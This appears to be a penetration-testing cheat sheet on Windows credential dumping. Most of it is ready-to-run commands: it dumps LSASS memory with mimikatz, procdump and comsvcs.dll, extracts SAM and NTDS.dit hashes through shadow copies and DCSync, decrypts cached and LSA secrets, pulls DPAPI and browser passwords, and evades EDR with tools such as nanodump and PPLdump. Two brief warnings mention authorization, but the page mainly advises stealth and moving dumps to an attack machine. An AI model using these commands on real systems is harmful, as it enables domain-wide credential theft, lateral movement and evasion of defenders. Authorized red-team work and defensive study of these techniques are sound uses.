Exploitation
Credential Dumping
Extract credentials from memory, registry, and Active Directory database to enable lateral movement and privilege escalation.
Warning
Credential dumping requires local administrator or SYSTEM privileges. Most techniques trigger AV/EDR detection.
Tool Installation
pypykatz
Python Mimikatz
pip install pypykatz secretsdump
Impacket tool
pip install impacket Credential Locations:
LSASS- Live memory, plaintext/hashes of logged-in usersSAM- Local user NTLM hashesNTDS.dit- All domain user hashes (DC only)LSA Secrets- Service account passwords, autologonDPAPI- Browser passwords, saved credentials
LSASS Memory Dump
LSASS (Local Security Authority Subsystem Service) stores credentials in memory. Dumping LSASS gives you credentials for all logged-in users.
What LSASS Contains:
- NTLM password hashes
- Kerberos tickets (TGT, TGS)
- WDigest plaintext passwords (if enabled)
- Cached credentials for offline logon
Warning
Detection: LSASS access is heavily monitored. Most EDRs alert on LSASS handle requests. Use EDR evasion methods in production environments.
Mimikatz (Direct)
Direct credential extraction from running LSASS. Requires SeDebugPrivilege (local admin).
text
# Enable debug privilege first
mimikatz# privilege::debug
# Should return: Privilege '20' OK
# Dump ALL credentials (most common)
mimikatz# sekurlsa::logonpasswords
# Shows: Username, Domain, NTLM, SHA1, and sometimes plaintext
# Dump specific credential types
mimikatz# sekurlsa::wdigest # WDigest (plaintext if enabled)
mimikatz# sekurlsa::kerberos # Kerberos tickets
mimikatz# sekurlsa::msv # NTLM hashes only
mimikatz# sekurlsa::credman # Credential Manager
mimikatz# sekurlsa::dpapi # DPAPI masterkeys
# Export Kerberos tickets
mimikatz# sekurlsa::tickets /export
# Creates .kirbi files for Pass-the-Ticket
# Enable WDigest for future logins (requires reboot)
mimikatz# reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1Create LSASS Dump File
Create a dump file for offline analysis. Safer than running Mimikatz directly on target.
powershell
# Method 1: Task Manager (GUI - simple but logged)
# Right-click lsass.exe > Create dump file
# Saved to: C:\Users\<user>\AppData\Local\Temp\lsass.DMP
# Method 2: Procdump (Sysinternals - often whitelisted)
procdump.exe -ma lsass.exe lsass.dmp
procdump.exe -ma -64 lsass.exe lsass.dmp # Force 64-bit
# Method 3: comsvcs.dll (built-in, no external tools)
# Find LSASS PID first
tasklist /fi "imagename eq lsass.exe"
# Or: (Get-Process lsass).Id
rundll32.exe comsvcs.dll, MiniDump 672 C:\temp\lsass.dmp full
# Method 4: PowerShell Out-Minidump
# Download: https://github.com/PowerShellMafia/PowerSploit
Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump -DumpFilePath C:\temp\
# Method 5: Direct from memory using handle duplication
rundll32.exe C:\windows\system32\comsvcs.dll MiniDump <PID> lsass.dmp fullAnalyze Dump Offline
Transfer dump to your attack machine for safe analysis without triggering target AV/EDR.
bash
# Mimikatz - Load and analyze dump
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords
# pypykatz (Python - works on Linux)
pip install pypykatz
pypykatz lsa minidump lsass.dmp
# Output formats
pypykatz lsa minidump lsass.dmp -o json > creds.json
pypykatz lsa minidump lsass.dmp -o grep > creds.txt
# Extract just the hashes
pypykatz lsa minidump lsass.dmp | grep -i ntlm
# pypykatz registry (for SAM/SYSTEM files)
pypykatz registry --sam SAM --system SYSTEM --security SECURITYTip
Best Practice: Dump LSASS → Exfiltrate dump file → Analyze offline with pypykatz. This minimizes detection on target.
Remote LSASS Dump
Dump credentials remotely without interactive access. Requires admin credentials.
bash
# CrackMapExec modules (various evasion techniques)
crackmapexec smb TARGET -u admin -p pass --lsa # LSA secrets
crackmapexec smb TARGET -u admin -p pass -M lsassy # lsassy module
crackmapexec smb TARGET -u admin -p pass -M nanodump # Stealthy dump
crackmapexec smb TARGET -u admin -p pass -M mimikatz # Direct mimikatz
# With hash
crackmapexec smb TARGET -u admin -H NTLM_HASH -M lsassy
# Impacket secretsdump (remote registry + DRSUAPI)
secretsdump.py corp.local/admin:password@TARGET
secretsdump.py -hashes :NTLM_HASH admin@TARGET
# lsassy (standalone)
pip install lsassy
lsassy -d corp.local -u admin -p password TARGET
lsassy -d corp.local -u admin -p password 192.168.1.0/24 # Subnet
# Specify dump method for evasion
lsassy -d corp.local -u admin -p password TARGET -m nanodump
lsassy -d corp.local -u admin -p password TARGET -m comsvcsSAM Database
The SAM (Security Account Manager) stores local user account NTLM hashes. Useful for Pass-the-Hash on local admin accounts.
Required Files:
SAM- Contains encrypted NTLM hashesSYSTEM- Contains boot key to decrypt SAMSECURITY- Contains cached domain creds, LSA secrets
Dump SAM Locally
powershell
# Method 1: Registry save (requires admin)
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY
# Transfer files to attack machine, then extract
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# Method 2: Volume Shadow Copy (for locked files)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
# Method 3: Mimikatz (directly from registry)
mimikatz# lsadump::sam
mimikatz# lsadump::sam /system:C:\temp\SYSTEM /sam:C:\temp\SAM
# Method 4: PowerShell (requires admin)
# Using Invoke-NinjaCopy or similar to bypass locksDump SAM Remotely
bash
# Impacket secretsdump
secretsdump.py corp.local/admin:password@192.168.1.100
# CrackMapExec
crackmapexec smb 192.168.1.100 -u admin -p pass --sam
# With hash
crackmapexec smb 192.168.1.100 -u admin -H NTLM_HASH --samNTDS.dit (Domain Controller)
NTDS.dit is the Active Directory database containing all domain user hashes. Requires Domain Admin or local admin on DC.
Location: C:\Windows\NTDS\ntds.dit
File is locked while AD is running - must use shadow copy or IFM backup
Danger
High Impact: Extracting NTDS.dit gives you EVERY domain user's hash. This should only be done with explicit authorization.
Volume Shadow Copy
Create a shadow copy to access locked files.
powershell
# Create shadow copy of C: drive
vssadmin create shadow /for=C:
# Note the shadow copy path from output (e.g., HarddiskVolumeShadowCopy1)
# Copy NTDS.dit (AD database)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit
# Copy SYSTEM hive (for decryption key)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
# List shadow copies
vssadmin list shadows
# Delete shadow copy (cleanup)
vssadmin delete shadows /shadow={GUID}
vssadmin delete shadows /all /quietntdsutil / diskshadow
powershell
# Method 1: ntdsutil IFM backup (creates clean backup)
ntdsutil "ac i ntds" "ifm" "create full C:\temp\ntds" q q
# Files created:
# C:\temp\ntds\Active Directory\ntds.dit
# C:\temp\ntds\registry\SYSTEM
# C:\temp\ntds\registry\SECURITY
# Extract hashes
secretsdump.py -ntds "C:\temp\ntds\Active Directory\ntds.dit" -system C:\temp\ntds\registry\SYSTEM LOCAL
# Method 2: diskshadow script (for automation)
# Create script.txt with:
# set context persistent nowriters
# add volume c: alias mydrive
# create
# expose %mydrive% x:
diskshadow /s script.txt
copy x:\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit
copy x:\Windows\System32\config\SYSTEM C:\temp\SYSTEM
# Cleanup
diskshadow /s cleanup.txt # unexpose x: ; delete shadows allExtract Hashes from NTDS.dit
bash
# secretsdump - Full extraction
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL
# Output to files
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -outputfile domain_hashes
# Creates: domain_hashes.ntds, domain_hashes.sam, domain_hashes.secrets
# NTLM hashes only (for Pass-the-Hash)
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -just-dc-ntlm
# Specific user only
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -just-dc-user Administrator
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -just-dc-user krbtgt
# With password history
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -history
# Output format: user:RID:LM:NTLM:::Remote NTDS Dump
bash
# DCSync (preferred method)
secretsdump.py corp.local/admin:password@dc.corp.local
# Or with Mimikatz
mimikatz# lsadump::dcsync /domain:corp.local /all /csvCached Credentials
Domain Cached Credentials (DCC2/mscash2) are stored when users log in while DC is unavailable. Slow to crack but useful.
bash
# Cached creds stored in SECURITY hive
# By default, Windows caches last 10 domain logons
# Mimikatz - extract cached creds
mimikatz# lsadump::cache
# From SECURITY hive (offline)
secretsdump.py -security SECURITY -system SYSTEM LOCAL
# CrackMapExec
crackmapexec smb TARGET -u admin -p pass --lsa
# Crack cached credentials with hashcat
# Format: $DCC2$10240#username#hash
# Mode 2100 is VERY slow (~50k/s vs millions for NTLM)
hashcat -m 2100 cached_creds.txt wordlist.txt
# Use rules for efficiency
hashcat -m 2100 cached_creds.txt wordlist.txt -r best64.ruleTip
Cracking Strategy: DCC2 is very slow to crack. Use targeted wordlists based on the organization (company name variations, password policies).
LSA Secrets
LSA secrets store sensitive data including service account passwords, autologon credentials, and VPN passwords.
LSA Secrets May Contain:
- Service account passwords (plaintext!)
- DefaultPassword (autologon)
- VPN/WLAN credentials
- Computer account password
- DPAPI system masterkey
bash
# Mimikatz
mimikatz# lsadump::secrets
# Impacket secretsdump (includes LSA secrets)
secretsdump.py corp.local/admin:password@TARGET
# CrackMapExec
crackmapexec smb TARGET -u admin -p pass --lsa
crackmapexec smb TARGET -u admin -H NTLM_HASH --lsa
# From SECURITY hive (offline)
secretsdump.py -security SECURITY -system SYSTEM LOCAL
# Look for service accounts with plaintext passwords
# Often see: _SC_<ServiceName> containing passwordWindows Credential Manager
Windows stores saved credentials (RDP, websites, etc.) encrypted with DPAPI. Requires user context or DPAPI keys.
text
# List saved credentials (user context)
cmdkey /list
# Credential files location
dir C:\Users\<user>\AppData\Local\Microsoft\Credentials\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
# Mimikatz - vault credentials
mimikatz# vault::cred
mimikatz# vault::list
# DPAPI credential decryption
# First, get masterkey for the user
mimikatz# dpapi::masterkey /in:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SID\GUID" /rpc
# Then decrypt credential file
mimikatz# dpapi::cred /in:"C:\Users\user\AppData\Local\Microsoft\Credentials\GUID" /masterkey:KEY
# If you have domain admin - extract all DPAPI keys
mimikatz# lsadump::backupkeys /system:dc.corp.local /export
# SharpDPAPI - Automated DPAPI extraction
SharpDPAPI.exe credentials
SharpDPAPI.exe machinevaults
SharpDPAPI.exe backupkey /nowrapBrowser Credentials
Browsers store saved passwords, cookies, and session tokens. Often contain valuable credentials for internal applications.
powershell
# SharpChrome - Chrome/Edge credentials (DPAPI-protected)
SharpChrome.exe logins # Saved passwords
SharpChrome.exe cookies # Cookies (session hijacking)
SharpChrome.exe history # Browsing history
# SharpWeb - Multiple browsers
SharpWeb.exe all
SharpWeb.exe chrome
SharpWeb.exe firefox
SharpWeb.exe edge
# LaZagne - All credential stores (browsers, mail, wifi, etc.)
# Download: https://github.com/AlessandroZ/LaZagne/releases
lazagne.exe all
lazagne.exe browsers
lazagne.exe browsers -oJ # JSON output
# Firefox credentials (not DPAPI protected)
# Firefox stores creds in profiles folder
python firefox_decrypt.py # https://github.com/unode/firefox_decrypt
# Locations:
# Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
# Firefox: %APPDATA%\Mozilla\Firefox\Profiles\*.default\logins.json
# Edge: %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login DataEDR Evasion Tips
Modern EDR solutions heavily monitor LSASS access. Use these techniques to avoid detection.
EDR Detection Points:
- Direct LSASS handle requests (OpenProcess)
- Known tool signatures (Mimikatz, procdump)
- MiniDumpWriteDump API calls
- Suspicious process lineage
powershell
# nanodump - Stealthier LSASS dump using syscalls
# https://github.com/helpsystems/nanodump
nanodump.exe --write C:\temp\lsass.dmp
nanodump.exe --valid # Create valid minidump
# HandleKatz - Dumps using duplicated handles (avoids direct access)
# https://github.com/codewhitesec/HandleKatz
handlekatz.exe --pid <lsass_pid>
# PPLdump - Bypass Protected Process Light
# https://github.com/itm4n/PPLdump
PPLdump.exe lsass.exe lsass.dmp
# SafetyKatz - In-memory Mimikatz (no disk write)
SafetyKatz.exe "sekurlsa::logonpasswords"
# MirrorDump - Uses memory-only dump
# https://github.com/CCob/MirrorDump
MirrorDump.exe
# Dump from hibernation file (completely offline)
mimikatz# lsadump::hibrsys /hiberfil:C:\hiberfil.sys /system:SYSTEM
# Direct syscalls with custom loader
# Avoid API hooks by using Nt* functions directlyExternal Resources
Mimikatz - GitHub
The definitive Windows credential tool
pypykatz - GitHub
Python implementation for offline analysis
lsassy - GitHub
Remote LSASS dumping with multiple methods
nanodump - GitHub
Stealthy LSASS dump using syscalls
LaZagne - GitHub
Retrieve passwords from many applications
HackTricks - Stealing Credentials
Comprehensive credential extraction guide
Tip
When possible, use offline analysis methods - dump the target (LSASS, SAM, NTDS) and extract credentials on your attack machine to avoid triggering real-time AV/EDR.